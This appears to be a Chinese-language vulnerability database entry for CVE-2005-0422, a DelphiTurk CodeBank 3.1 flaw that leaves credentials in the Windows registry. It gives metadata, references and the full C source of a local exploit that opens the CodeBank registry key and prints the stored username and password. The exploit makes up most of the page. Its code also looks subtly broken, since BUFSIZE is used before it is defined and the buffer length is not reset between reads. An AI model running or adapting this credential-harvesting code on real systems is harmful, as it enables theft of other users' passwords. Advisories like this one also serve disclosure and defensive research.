DelphiTurk CodeBank 注册键权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108444 漏洞类型 未知
发布时间 2005-02-08 更新时间 2005-04-27
CVE编号 CVE-2005-0422 CNNVD-ID CNNVD-200504-122
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/798
https://www.securityfocus.com/bid/90264
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200504-122
|漏洞详情
未找到该软件的介绍。DelphiTurkCodeBank(akaKodBank)3.1及更早版本在Codebank注册键中存储用户名和密码,本地用户可以借此获取权限。
|漏洞EXP
/*******************************************************************
 
DelphiTurk CodeBank Local Exploit
 
Application: DelphiTurk CodeBank 3.1 (and previous versions)
Procuder: Delphiturk.com
Vulnerable Description: Delhiturk CodeBank discloses username and password to
local users.
 
 
Coded by: Kozan
Web: www.netmagister.com
Mail: kozan[at]netmagister[dot]com
 
*******************************************************************/
 
 
#include <stdio.h>
#include <windows.h>
 
HKEY hKey;
char username[BUFSIZE], password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
#define BUFSIZE 100
 
int main(void)
{
 
	 if(RegOpenKeyEx(HKEY_CURRENT_USER,
					"Software\\DelphiTurk\\Codebank",
					0,
					KEY_QUERY_VALUE,
					&hKey) == ERROR_SUCCESS)
	 {
 
            lRet = RegQueryValueEx( hKey, "username", NULL, NULL,
               (LPBYTE) username, &dwBufLen);
 
			if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
				 RegCloseKey(hKey);
				 printf("En error occured!");
				 return 0;
			}
 
 
			lRet = RegQueryValueEx( hKey, "password", NULL, NULL,
               (LPBYTE) password, &dwBufLen);
 
			if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
				 RegCloseKey(hKey);
				 printf("En error occured!");
				 return 0;
			}
            RegCloseKey( hKey );
			printf("DelphiTurk CodeBank Local Exploit by Kozan\n\n");
			printf("Username: %s\n",username);
			printf("Password: %s\n",password);
 
 
	 }
	 else{
		 printf("DelphiTurk Codebank is not installed on your system!");
	 }
 
 
	return 0;
}


// milw0rm.com [2005-02-08]
|受影响的产品
Delphiturk Codebank 3.1
|参考资料

来源:XF
名称:delphiturkcodebank-obtain-information(19248)
链接:http://xforce.iss.net/xforce/xfdb/19248
来源:SECTRACK
名称:1013139
链接:http://securitytracker.com/id?1013139